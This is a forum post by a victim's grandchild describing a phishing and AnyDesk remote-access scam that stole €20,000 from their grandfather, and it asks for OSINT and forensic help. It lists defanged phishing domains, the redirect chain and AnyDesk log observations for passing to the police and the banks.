My grandpa lost €20,000 in a phishing + AnyDesk scam, looking for OSINT/forensics advice
Hi all,
My grandpa was the victim of a phishing scam on 15/05/2026, and the scammers managed to steal around €20,000. I am trying to gather as much information as possible for the police and the banks, and I would really appreciate help from people with OSINT, phishing-analysis, or malware/forensics experience.
I am not asking anyone to harass, dox, or contact anyone. I am only looking for help identifying technical indicators, infrastructure, mistakes in the phishing setup, or useful evidence that could be passed on to the police, banks, AnyDesk, registrars, or hosting providers.
What happened:
I was passing by my grandparents today, 15/05/2026, and the first thing my grandma said was that there was something wrong with my granddad, something related to fraud. I immediately went over to him at his computer and saw all his bank cards lying on his desk while he was on the phone using the landline. He told me he could no longer access his bank accounts (firewall blocked by the fraudsters).
Right after that, he received another call on his smartphone. I picked up, and some guy told me he was from Bank X and that he had spoken to my grandpa regarding blocking his card. Meanwhile, my grandpa was still on the phone with someone else, also claiming to be from the same Bank X, and both of them were accusing each other of being the fraudster. I immediately dropped everything and called Card Stop to block all his cards. Afterwards, I called both banks where my granddad has an account to see what the damage was and to let them know so they should start a fraud case.
Because this happened on a Friday evening, the banks are now closed for the weekend. Since the cards are blocked, I cannot access his online banking anymore to see the transaction details, including the destination account. Without this information, the police cannot yet file a request to block the transaction or the receiving bank account. We now have to wait until Monday to go to the bank in person, which is ridiculous given the urgency of the situation.
I have gathered all the necessary information to move forward, including filing a police report. However, I would really like to find out more about the technical side of the scam, because I suspect the scammers may have made a mistake and left behind a trail. My knowledge in this area is limited, so I would really appreciate it if someone with experience in OSINT, phishing analysis, or digital forensics could help me identify useful evidence.
Phishing email:
My grandpa received a phishing email from a custom domain trying to copy a Belgian government application, more specifically My eBox.
The email was sent on 15/05/2026 at 05:25 GMT+2 from:
noreply@beheeruwebox[.]com
After doing a quick ICANN lookup for:
beheeruwebox[.]com
I saw that the domain was registered on 15/05/2026 at 04:21 GMT+2 through Namecheap.
Unfortunately, nowadays the personal information of the person who registers a domain is withheld. However, I am hoping that the Belgian police may be able to get a claim through the court to request this information from Namecheap. If the fraudster was lazy, he might have used his real credentials, and if not his real credentials, maybe his or her real credit card or another traceable payment method. You never know.
Phishing flow:
The phishing email convinced my grandpa that some amount of money had been credited to him regarding a holiday here in Belgium, but that the details regarding this were not fully completed yet. All bullshit, of course.
In the email, there was a button to go to “his profile” to complete this information. Behind this button was a hyperlink to:
ionsa[.]net
After clicking it, he was automatically redirected to:
vsaldjljsmlk[.]info
and finally to:
vlaamsburger[.]ovanmslalbe[.]com
This phishing website tried to copy the interface you would see on that Belgian government application. Here, my grandpa filled in his details, shortly after which he received a phone call from the fraudsters.
Domain observations:
After another quick ICANN lookup for:
ionsa[.]net
it shows that this domain is registered through publicdomainregistry[.]com, was created in 2008, and was updated in 2026. It contains some contact information, but I do not know what to think of that. It might be meaningful, but it could also be a hacked account or compromised domain.
I did the same for:
vsaldjljsmlk[.]info
This domain appears to be registered through Namecheap and was created on 15/05/2026 at 15:35 GMT+2. This is very weird, because the fraudsters made my grandpa install AnyDesk, and from the logs I was able to see a first remote connection at around 14:18 GMT+2. So maybe this redirect domain was added after the scam. Why? I do not know.
The same goes for:
ovanmslalbe[.]com
This domain also appears to be registered through Namecheap and was created on 15/05/2026 at 15:28 GMT+2.
However, when I put ionsa[.]net through a URL scan on urlscan[.]io, it reported vsaldjljsmlk[.]info as being around 40 minutes old now at the time of writing this post many hours after the scam. Perhaps this redirect domain gets refreshed constantly to avoid blocklists? That would clarify my earlier confusion.
My current guess is:
ionsa[.]net is used because it does not look like a scam domain at first sight. Maybe that helps prevent it from being flagged by the email client.
vsaldjljsmlk[.]info is then used as a throwaway redirect domain, in case it gets flagged or blocked.
ovanmslalbe[.]com hosts the actual phishing page, including the HTML and everything behind it, which would probably take more time to replace if it gets flagged.
But I am not sure whether this interpretation is correct.
Phishing website:
I briefly looked at their phishing website:
vlaamsburger[.]ovanmslalbe[.]com
It looks very poorly made. Most of the official-looking redirects that the real government application would normally have do not work. Because of that, I feel there must be some trails hidden there, maybe something in the HTML, JavaScript, forms, tracking code, or maybe a POST request that shows where the submitted information is being sent.
One thing I find interesting is that my grandpa insists that he did not press the final button to send the information. So I am curious how they were still able to get his information and call him. Maybe the site sends form data the moment you input a character in the fields?
AnyDesk / remote access:
After they called my grandpa, they told him there was a fraudulent transaction on his bank account due to a virus. Long story short, they made him install AnyDesk and then made him share or enter his bank details. They took over control, transferred the money, and afterwards showed him pictures of expensive perfume and luggage, claiming that this was what had been bought with the money that was transferred away due to the virus.
They then closed by saying that everything was okay now, that his card would be blocked, and that his money would be returned. Lowest scum on earth.
I have some logs from AnyDesk and have sent AnyDesk an email asking whether they can help, but I am not sure whether this will result in anything.
They also installed gcapi.dll, perhaps from the Connective signing extension plugin that was also installed in his Chrome browser. Furthermore, they installed Digipass and SignID, which I assume was to get his card or authentication process to work.
Other observations:
Additionally, they also cleared the Chrome history and blocked the websites of both banks he has an account with in the firewall.
The AnyDesk logs say that the first connection was made at 14:18 GMT+2, while the first instance of AnyDesk in his browser/search history that I was able to recover was at 16:15 GMT+2. According to the recovered Google history, the scam continued until at least 19:44 GMT+2.
Again, I am not asking anyone to identify, harass, dox, or contact a private individual. I am only trying to collect useful technical indicators and evidence that can help the police, the banks, registrars, hosting providers, and AnyDesk take the appropriate action.
Once everything important has been preserved and documented, I will fully wipe his computer and reinstall it. However, before I do that, is there anything crucial I may have missed that should be checked, preserved, or reported as soon as possible?
Any advice, pointers, or help would be greatly appreciated. I know this is a lot of information, but even a small suggestion could be useful at this point.